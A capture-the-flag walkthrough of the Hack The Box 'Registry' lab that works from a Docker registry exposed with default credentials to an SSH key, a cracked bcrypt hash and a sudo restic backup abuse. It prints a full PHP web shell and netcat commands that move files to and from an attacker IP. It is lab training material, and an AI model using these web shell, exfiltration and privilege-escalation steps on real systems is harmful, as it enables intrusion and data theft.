Hackthebox - Active - Registry
Recon
As always I start with a simple Up/Down scan on all open TCP ports to see what is up
$ nmap -T4 -p- -oX ./nmapb.xml registry.htb
Then Convert that to HTML to make it pretty
$ xsltproc ./nmapb.xml -o ./nmapb.html
Alright looks like port 22,80 and 443 lets rescan just those ports using the -A switch to run all scripts and try to finger OS/Services
$ nmap -T4 -A -p22,80,443 -oX nmapf.xml registry.htb
Then I’ll convert that to HTML Also
$ xsltproc ./nmapf.xml -o ./nmapf.html
Ok so we got OpenSSH 7.6p1 on 22 and nginx on 80 and 443.
Let’s see what is on the website
Default nginx page.
When we see a SSL page it’s always a good idea to take a peek at the certificate installed to see if it give us any more information
Looks like its issues to a subdomain or vhost docker.registry.htb
I added this to my etc/hosts and tried to browse the site
It returns a completely empty page. No source code or anything, but also no error messages.
I started up a dirb scan as well as nikto to see if they could find anything interesting
Nikto found the /v2/_catalog directory with admin/admin
It let me login with admin/admin just like nikto said.
If you are not super familiar with docker like me, now would be a good time to do a google search and learn about it at at least a basic level.
https://www.docker.com/why-docker
My basic understanding is this:
Docker works kinda like a virtual machine, but at the application layer and not the OS layer. It takes an application and its dependencies and wraps it up in a container. The goal behind this is a packaged application that can run on any system. So even if you have a highly customized OS a program that is packaged with docker has all the dependencies it needs to run and it will rerun the same on any system.
Hopefully that's enough to get you started on understanding what docker is.
So when we see this api pull up and it lists bolt-image as a repository, that would lead me to believe there is only one docker application on this system and its name is “bolt-image”
I found this webpage that talks about attacking a docker registry
https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/
We can get a little more info about the bolt-image using
http://docker.registry.htb/v2/bolt-image/tags/list#
The only tag for bolt-image is “latest”
Let’s pull down the manifests for latest
http://docker.registry.htb/v2/bolt-image/manifests/latest
Let’s grab all the blobgsum’s and open them up
Just copy and paste each of the sha256 blobsums in the url
http://docker.registry.htb/v2/bolt-image/blobs/
Save them to your computer.
There were 12 in total
To unzip them give them all .zip extension and then unzip them
I created a folder for each blob name for the first4 digits of the blob
Unzipped the blobs into there and now we have a tar in each folder, which we untar.
We see a bunch of folders some with very little data, some with much more
In folder 302 I found this sh script
01-ssh.sh
Which looks like it contains a passphrase for a private key
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
Under this folder I found some more goodies
~/Desktop/HTB/registry/blobs/gzip/2931a/sha256_2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791_FILES/root$
Under .ssh
A private key and some other documents
Here is a user name in the config file
THen back under the /root directory is ./.bash_history
You can see them create a username bolt, then delete it. I assume this has to do with when they created the docker instance of bolt. They didn’t want to leave the user on the actual machine.
Then create the private key we just found.
Exploit
Let’s see if we can connect up to the machine using the private key we just found. First We need to change the permissions on the file because if we don’t it will complain about the file permissions being too open and not use the key.
$ chmod 700 ./id_rsa
Dang it wants a passphrase….
But didn’t we find a passphrase?
From 01-ssh.sh
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
Let’s try that passphrase. We can drop the \n since that is just a new line/carriage return thing.
YAY!! We got in.
Let’s see if we can get the user hash now
bolt@bolt:~$ ls
user.txt
bolt@bolt:~$ cat user.txt
ytc********************************
User is cool and what not…. But I want to be David Bowie level cool…. Let’s get root and make David Happy
Poking around in /var/www/
I came across a directory name bolt.
index.html
A website
Poking around the files system some more I found this file ./boltdb
In /var/html/bolt/app
I tried just using NetCat to send the file over but it would never make a connection.
I setup on my Kali box
Nc -lnvp 5555 > bolt.db
And on the bolt box
Nc 10.10.14.48 5555 < bolt.db
But like I said it would never make the connection. I tried FTP too but it wouldn’t make the connection.
I guessed at some point that there was some outbound filtering on the box.. Maybe I could connect in instead with netcat
On bolt I did
$ nc -lnvp 5555 < ./bolt.db
Then on my Kali box
$ nc registry.htb 5555 > bolt.db
Yay I got the DB, let’s open it up and
There is a table here named users
And it contains a record for admin
With this
$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
Under password…
Silly DB that’s not a password its a hash
Tunnels up says its a bcrypt hash
Let’s fire up hashcat and see if we can find the bugger in rockyou.txt
First I save the in a file named hash
Then since its bcrypt did -m 3200
$ hashcat -m 3200 ./hash /home/circusmonkey/rockyou.txt --force
Since my kali is a VM i have to use --force to get it to run
strawberry huh?
Can we login with admin/strawberry
Sure can..
Now let's figure out priv esc from here.
So we got a couple things going on here…
We can’t upload php files
Any file we upload under file management gets deleted.
Here if we upload an HTML file to File management
It get deleted pretty quickly
But if we upload things under theme directories… they stick
I chose the skeleton theme to hold my payloads cause I liked the name
You can see some other ways I tried to get around the upload filter.
So now that we can keep files on the server… lets see if we can get it to allow php files
Under configuration -> main configuration we see here the filter in place
All we need to do here is add php to this list.
However this resets too so you’ll need to work quick, i found you needed to hit save twice to get this filter to work
So I decided to finally use this shell which gives me a prompt I can use to run commands as the user running the web service.
https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
So now
With this file saved to my kali box as easyshell.php
I’ll add php to the filter list save it and quickly upload the shell to the skeleton theme folder
Here is the folder showing easyshell.php the themes folder
Now let’s browse to it and see if we can get execution
There we go let’s try to ping our kali box too just to make sure we can reach it.
Just did ping 10.10.14.48
Here is my tcpdump showing the pings
Cool…. Now let’s try and get a shell that is not part of docker app
Didn’t have any luck getting a bind or reverse shell using netcat.
But that won’t stop us from some more enumeration
Sudo -l gave me this output
Cool I can run some program called restic as sudo with no password
What is restic?
Looks like its a backup software
And looks like we are able to initiate a backup using root privs with no password. The -R switch is the name/path of the repository we are backing up to.
Here is the documentation on the restic repos
https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html
One of the things on this page is the next clue to how we can leverage this
One of the repositories we can use is called a “Rest Server”.
Which fits perfectly with that somman we can issues
You initiate using
restic -r rest:https://user:pass@host:8000/my_backup_repo/
Then the backup command looks like this
Restic backup -r rest:http://restseervername/folder and then the target of the backup. Which we will user /root to grab all the files out of the root folder which is hopefully where are root hash is for this box.
Restic creates encrypted backups which require a password. I don’t really like typing passwords in, because I often mis type them. Luckily restic allows us to use a password file with the -p flag
So some psuedo logic of what we are trying to do
Use restic with its sudo powers for the www-data account. To backup the /root directory to a rest-server then use the bolt account to open the the repository and get the root hash.
I’ll setup the rest server on my attacking kali box
Installation is pretty easy
https://github.com/restic/rest-server
I used
Sudo git clone https://github.com/restic/rest-server.git
To clone the repo to my /opt folder
If you have golang installed on kali
go run build.go
If you don’t have golang just sudo apt-get install golang
There aren’t a lot of flags that need to be set to get it running..
Just two we really care about. By default rest-server requires a user/pass so we will use --no-auth to get around that. The other flag we will want to do is say which directory we are going to use as our repo path with the -path
Here is what our command will look like on our kali box
$ ./rest-server --path /tmp/ --no-auth
We are simply starting the rest server with the path /tmp and telling it to not use authentication.
The next part of the setup for restic is to initialize the repo
Which should look something like this
restic -r rest:https://user:pass@host:8000/my_backup_repo/
Then we would be able to issue our backup command to backup whatever target we want to our rest:server repo
Restic backup -r rest:http://10.10.14.48:8000/reponame /root
This command sure looks a lot like our entry in the sudoers file so it should allow us to run it as root with no password
So we will use both accounts to accomplish this since our php shell is not interactive. I'm going to use the bolt SSH to every command except the sudo backup command.
As the bolt user I’ve created some folder in the tmp directory to save my password file and restore the repo to.
/tmp/circusmonkey/restore
/tmp/circusmonkey/storage
I’m going to create the password file first.
Now we can initiate our start our rest-server on my attacking box and initiate it from the
Bolt ssh on registry
On kali
$ ./rest-server --path /tmp/ --no-auth
Now for the initialization on the registry box
restic -r rest:http://10.10.14.48:8000/repo -p ./storage/pass.txt init
Oh yeah this box can talk out….. Poop
Ok we have to use this restserver to get our elevated rights in the sudoers folder..
The box also won’t talk to github to clone the repo
I think our only hope here is the rest-server executable we created is portable and we can move it to the registry and it doesn’t have any dependencies that will keep it from working on…
But remember earlier when we were trying to exfil that DB that we had to use registry as the listener and our attacking machine as the client to exfil the DB. Now we need to do the same thing but change the direction of the files.
So we will on bolt
Nc -lvnp 4444 > rest-server
This command basically says listen on port 444 and whatever comes in there stick it in a file called rest-server
And on our kali box from the /opt/rest-server folder we will do
Nc registry.htb 4444 < rest-server
While this command says take the contents of rest-server and send it to registry.htb on port 444
Let’s give it a try
Here is what it looks like on the registry side
You can see that I started in the /tmp/circusmonkey/storage folder where I’m storing the pass.txt file
Then I started my netcat listener to receive the rest-server file. You have to just kinda guess at how long the file transfer is going to take and then stop the execution.
Then another ls shows the file in the directory.
Now we need to give execution rights
Chmod +x ./rest-server You can see I almost always do Capital X by mistake which doesn't work
Here is what happened on the attacking box
Not nearly as eventful
Now is the moment of truth will this work?
Woot same errors as running it on my kali boxes with no switches
So let’s fire up the server.
./rest-server --path /tmp/circusmonkey/repo --no-auth &
Now lets initialize our repo, using our password file to insert the password
restic -r rest:http://localhost:8000/backup_repo/ init -p /tmp/circusmonkey/storage/pass.txt
Now, we need to backup /root so we can grab the root.xt file
sudo /usr/bin/restic backup -r rest:http://localhost:8000/backup_repo /root -p /tmp/circusmonkey/storage/pass.txt
That looks promising
scan [/root]
[0:00] 10 directories, 14 files, 28.066 KiB
scanned 10 directories, 14 files in 0:00
[0:00] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00
duration: 0:00
snapshot f82d2b6e saved
I tried restoring via the rest server but kept getting this error
Fatal: unable to open config file: <config/> does not exist
Is there a repository at the following location?
rest:http://localhost:8000/back_repo
Luckily the rest-server has server its purpose and we can just interact with the repo on the disk now at /tmp/cirucsmonkey/repo/backup_repo
restic -r /tmp/circusmonkey/repo/backup_repo/ -p /tmp/circusmonkey/storage/pass.txt ls f82d2b6e
The ls here will let use view the files in the repo
Root.txt is there
We just need to restore the snapshot into our restore folder and see if we can get that hash.
restic -r /tmp/circusmonkey/repo/backup_repo/ -p /tmp/circusmonkey/storage/pass.txt restore latest --target /tmp/circusmonkey/restore/
There a bunch of errors about permissions but…
We still get our hash
drwx------ 7 bolt bolt 4096 Oct 21 10:37 root
bolt@bolt:/tmp/circusmonkey/restore$ cd root
bolt@bolt:/tmp/circusmonkey/restore/root$ ls
config.yml cron.sh root.txt
bolt@bolt:/tmp/circusmonkey/restore/root$ cat root.txt
ntrkz********************************
Comments
Post a Comment